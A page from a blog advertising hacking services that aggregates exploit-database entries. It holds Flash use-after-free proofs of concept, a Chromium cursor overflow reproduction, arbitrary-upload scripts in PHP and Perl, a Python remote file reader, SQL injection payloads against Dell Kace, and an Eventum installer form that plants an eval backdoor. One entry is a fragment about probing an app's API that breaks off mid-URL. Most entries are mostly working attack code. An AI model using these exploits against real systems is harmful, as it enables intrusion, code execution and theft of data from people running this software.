Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863138698

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=664

There is an overflow in the ui::PlatformCursor WebCursor::GetPlatformCursor method. In src/content/common/cursors/webcursor_aurax11.cc&q=webcursor_aurax11.cc, there is the following code:

bitmap.allocN32Pixels(custom_size_.width(), custom_size_.height());
memcpy(bitmap.getAddr32(0, 0), custom_data_.data(), custom_data_.size());

The bitmap buffer is allocated based on the width and height of the custom_size_, but the memcpy is performed using the size of the custom_data_.

These values are set during WebCursor deserialization in src/content/common/cursors/webcursor.cc in WebCursor::Deserialize.

custom_size_ is set from two integers that a deserialized from a message and can be between 0 and 1024. custom_data_ is set from a vector that is deserialized, and can be any size, unrelated to the width and height. The custom_data_ is verified not to be smaller than the expected pixel buffer based on the width and height, but can be longer.

GetPlatformCursor is called indirectly by RenderWidgetHostImpl::OnSetCursor, which is called in response to a  ViewHostMsg_SetCursor message from the renderer.

The issue above is in the x11 implementation, but it appears also affect other platform-specific implementations other than the Windows one, which instead reads out of bounds.

I recommend this issue be fixed by changing the check in WebCursor::Deserialize:

if (size_x * size_y * 4 > data_len)
    return false;

to

if (size_x * size_y * 4 != data_len)
    return false;

to prevent the issue in all platform-specific implementations.
 
To reproduce the issue replace WebCursor::Serialize with:

bool WebCursor::Serialize(base::Pickle* pickle) const {

  if(type_ == WebCursorInfo::TypeCustom){
  LOG(WARNING) << "IN SERIALIZE\n";
  if (!pickle->WriteInt(type_) ||
      !pickle->WriteInt(hotspot_.x()) ||
      !pickle->WriteInt(hotspot_.y()) ||
      !pickle->WriteInt(2) ||
      !pickle->WriteInt(1) ||
      !pickle->WriteFloat(custom_scale_))
     return false;
   }else{

     if (!pickle->WriteInt(type_) ||
      !pickle->WriteInt(hotspot_.x()) ||
      !pickle->WriteInt(hotspot_.y()) ||
      !pickle->WriteInt(custom_size_.width()) ||
      !pickle->WriteInt(custom_size_.height()) ||
      !pickle->WriteFloat(custom_scale_))
    return false;

  }
  const char* data = NULL;
  if (!custom_data_.empty())
    data = &custom_data_[0];
  if (!pickle->WriteData(data, custom_data_.size()))
    return false;

  return SerializePlatformData(pickle);
}

and visit the attached html page, with the attached image in the same directory.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39039.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=593

There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.

A minimal PoC follows:

this.createEmptyMovieClip("mc", 1);
var b = new flash.display.BitmapData(100, 100, true, 0x77777777);
mc.attachBitmap( b, {valueOf : func });

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap here

        return 5;
	
	}
	


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=591

There is a use-after-free in MovieClip.duplicateMovieClip. If the depth or movie name parameter provided is an object with toString or valueOf defined, this method can free the MovieClip, which is then used. 

A minimal PoC follows:


this.createEmptyMovieClip("mc", 1);

mc.duplicateMovieClip( "mc",{valueOf : func});


function func(){
	
	trace("in func");
	mc.removeMovieClip();

        // Fix heap here

	return 5;
	
	}
	
	
A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=590

There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed. A minimal PoC follows:

var mc = this.createEmptyMovieClip("mc", 301);
var myText_txt = mc.createTextField("myText_txt", 302, 1, 1, 100, 100);
myText_txt.text = "this is my text";
Selection.setFocus("myText_txt");
var n = {valueOf : func};
Selection.setSelection(n, 3);

function func(){

  mc.removeMovieClip();
  // Fix heap here
  return 0;

}

A sample swf and fla are attached. Note that this PoC only works on 64-bit platforms.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39043.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=586

The TextField setFormat method contains a use-after-free. If an integer parameter has valueOf defined, or the object parameter overrides a constructor, this method can free the TextField parent, which is subsequently used.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
var f = new TextFormat();
tf.setFormat( {valueOf : func}, 2, f);

function func(){

        if(times == 0){
             times++;
             return 0;

         }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39046.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=588

There is a use-after-free in the TextField sharpness setter. If the sharpness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.sharpness = {valueOf : func};

function func(){
   
        if(times == 0){
          times++;
          return 0;
        }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39044.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=587

There is a use-after-free in the TextField thickness setter. If the thickness parameter is an object with valueOf set to a function which frees the TextField parent, it is used after it is freed.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.thickness = {valueOf : func};

function func(){
   
        if(times == 0){
          times++;
          return 0;
        }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39045.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=585

There is a use-after-free in TextField.replaceSel. If the string parameter of the method is set to an object with toString defined, this method can delete the TextField's parent, leading to a use-after-free.

A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceSel({valueOf : func});

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "text";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39047.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=584

There is a use-after-free in the TextField.replaceText function. If the function is called with a string parameter with toString defined, or an integer parameter with valueOf defined, the parent object of the TextField can be used after it is freed. Please note that all three parameters of this function are susceptible to this issue.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceText( 1, 2, {valueOf : func});

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "text";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39048.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=579

There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.variable = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "myvar";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39050.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=583

If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 301);
var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100); 
trace(my_txt);
my_txt.variable = "today_date"; 
mc.today_date = "blah"; 
var times = 0;
 
var date_interval:Number = setInterval(updateDate, 500);
 
function updateDate() { 
    mc.today_date = {toString : func}; 
}

function func(){
	if(times == 0){
		times++;
		mc.removeMovieClip();
	}

	return "test";
	
	}

A sample fla and swf are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39049.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=578

There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.htmlText = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "<b>hello</b>";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39051.zip
HireHackking

0x01はじめに

ポルノアプリのインターフェイスを見つけます

1049983-20220106104242134-1415031552.png

私は機能ポイントを見て、登録場所がありましたが、登録時に実際に招待コードが必要でした!

0x02浸透プロセス

だから、アプリを仮想マシンに置き、パケットをキャッチして実際のドメイン名を取得してください。

1049983-20220106104242691-969258238.png

次に、BPクローラーを使用してAPIインターフェイスにクロールします

1049983-20220106104243173-1846676373.png

プロンプトパラメーターが欠落しているファズ1波パラメーター

1049983-20220106104243568-136728470.png

http://www。

HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=577

There is a use-after-free in the TextField.type setter. If the type the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.type = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "input";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39052.zip
HireHackking 
Source:  https://code.google.com/p/google-security-research/issues/detail?id=576

There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.text = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "natalie";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip
HireHackking 
source: https://www.securityfocus.com/bid/65123/info

GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information, which may aid in further attacks.

GoToMeeting 5.0.799.1238 is vulnerable; other versions may also be affected. 

<! ----- SNIPPET ------- !>

D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal(  787): hal_process_report_ind: Bad item quality: 11 
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> {"Status":"Redirect","RedirectHost":"www1.gotomeeting.com","MeetingId":"[MEETING_ID_REDACTED]"}
D/G2M     (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 
{"Status":"MeetingNotStarted","MeetingId":"[MEETING_ID_REDACTED]","IsRecurring":false,"Endpoints":["Native"],"OrganizerName":"[REDACTED]","Subject":"[REDACTED]","MaxAttendees":100,"IsWebinar":false,"AudioParameters":{"CommParams":{"disableUdp":false},"ConferenceParams":{"supportedModes":"VoIP,PSTN,Private","initialMode":"Hybrid","SpeakerInfo":{"PhoneInfo":[{"description":"Default","number":"[REDACTED],"authToken":"AAFe4rYexu4Dm7qrL45/Egx+AAAAAFLdeSkAAAAAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa","accessCode":"REDACTED"},"userId":"userId","authToken":"EAEBAQEBAQEBAQEBAQEBAQE=","privateMessage":"","audioKey":-1,"BridgeMutingControl":true,"VCBParams":{"Codec":[{"payloadType":103,"frameLength":30,"name":"ISAC","bitrate":32000,"channels":1,"samplingRate":16000},{"payloadType":0,"frameLength":20,"name":"PCMU","bitrate":64000,"ch
 
annels":1,"samplingRate":8000}],"VCB":{"port":5060,"ipAddr":"10.23.70.151"},"Options":{"asUpdates":true,"rtUpdates":true,"dtx":false}}}},"EndTime":1390239900000,"StartTime":1390237200000,"IsImpromptu":false}
D/G2M     (32190): Got response from legacy JSON API: 200
D/G2M     (32190): JoinService: Attempting to join Meeting
D/G2M     (32190): MeetingService: Starting Meeting join on legacy...
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M     (32190): ServiceResolver: COLService: BaseURL [https://www.example.com], isLegacy [true}, isWebinar 
[false]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> 302
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<! ----- SNIPPET ------- !>
HireHackking 
source: https://www.securityfocus.com/bid/65646/info

MODx Evogallery module is prone to an arbitrary file upload vulnerability.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$uploadfile="file.php"; 
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,       
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload file from the server to a client.
# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
# and does not check if it has sent the UDP request which gives us full Read access to the system.
#
#EDB Note: Code my need some adjusting

import socket
#Banner
banner = ""
banner += "  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner



IP = "192.168.43.36" # Target IP
PORT = 831
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read



s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
file_to_read = "\x43" + file_to_read
hex_value = ''.join(x.encode('hex') for x in file_to_read)
fill = "\x00"
end = "\x01\x00\x00\x00\x01"
payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
s.send(payload)
s.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"

try:
	data = s.recv(261) # Get header
	while data:
		data = s.recv(2048)
		print data
		
except Exception:
	print "[+] https://www.infogen.al/ [+]"
finally:			
	s.close()
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt



Vendor:
==============
M. Jean Fages
www.accessdiver.com
circa 1998-2006


Product:
=============================
AccessDiver V4.301 build 5888


AccessDiver is a security tester for Web pages. It has got a set of tools
which
will verify the robustness of you accounts and directories. You will know
if your
customers, your users and you can use safely your web site.


Vulnerability Type:
===================
Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

AccessDiver is vulnerable to multiple buffer overflows, two vectors are
described below.

1) buffer overflow @ 2073 bytes in URL field for Server / IP address and
will overwrite NSEH and SEH exception handlers.

EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252                 <----------------- BOOM
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1272  Prec NEAR,53  Mask    1 1 0 0 1 0



2) Buffer overflow  when loading a malicious "Exploit zone file" text file
containing 2080 bytes,
load text file from "Weak History" Menu choose Import "from File" choose
exploit text file and BOOM!


EAX 00000000
ECX 52525242
EDX 7702B4AD ntdll.7702B4AD
EBX 00000000
ESP 0018E940
EBP 0018E960
ESI 00000000
EDI 00000000
EIP 52525242                      <----------------- KABOOM
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00210246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0


Windbg dump...

(2abc.2330): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7702b4ad esi=00000000
edi=00000000
eip=52525252 esp=0018e7f4 ebp=0018e814 iopl=0         nv up ei pl zr na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010246
52525252 ??              ???



Disclosure Timeline:
=====================================
Vendor Notification:  NA
December 26, 2015 : Public Disclosure




Exploitation Technique:
=======================
Local



Severity Level:
================
Med



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/65029/info

Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected. 

Proof of Concept
Page: /service/kbot_service.php
Web method: getUploadPath
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
SOAPAction: "urn:#getUploadPath"
Content-Length: 543

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getUploadPath soapenv:encodingStyle= "http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or '1'='1</macAddress>
         <filename xsi:type="xsd:string">test</filename>
      </urn:getUploadPath>
   </soapenv:Body>
</soapenv:Envelope>
Page: /service/kbot_service.php
Web method: getKBot
Parameter: macAddress
PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
POST /service/kbot_service.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: www.example.com
Content-Type: text/xml;charset=UTF-8
SOAPAction: "urn:#getKBot"
Content-Length: 553

<soapenv:Envelope xmlns:xsi="http://www.example.org/2001/XMLSchema-instance" xmlns:xsd="http://www.example.org/2001/XMLSchema" xmlns:soapenv="http://example.xmlsoap.org/soap/envelope/" xmlns:urn="urn:kbot_service.wsdl">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:getKBotConfig soapenv:encodingStyle="http://example.xmlsoap.org/soap/encoding/">
         <macAddress xsi:type="xsd:string">' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''='</macAddress>
      </urn:getKBotConfig>
   </soapenv:Body>
</soapenv:Envelope>
The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
Page: /userui/advisory_detail.php
PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2
Notes: Requires Authentication
Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
Parameter: ORDER[]
Notes: Requires Authentication
Page: /userui/ticket.php?ID=86
Parameter: ID
Notes: Requires Authentication
HireHackking 
source: https://www.securityfocus.com/bid/65059/info

Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Imageview 6.x are vulnerable; other versions may also be affected. 

http://www.example.com/photos/upload.php
http://www.example.com/Galerie/upload.php
HireHackking 
source: https://www.securityfocus.com/bid/65121/info

XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected. 

http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
HireHackking 
source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
HireHackking 
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication:  January 22, 2014  [without technical details]
Vendor Notification: January 22, 2014 
Vendor Patch: January 24, 2014 
Public Disclosure: January 27, 2014 
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical 
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.


1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application. 

The installation script can be access by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php


2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server. 

The following exploitation example injects a backdoor into "/config/config.php" file:


<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>


After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

-----------------------------------------------------------------------------------------------

Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

Vendor disclosed vulnerabilities and authorized us to release advisory on public before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

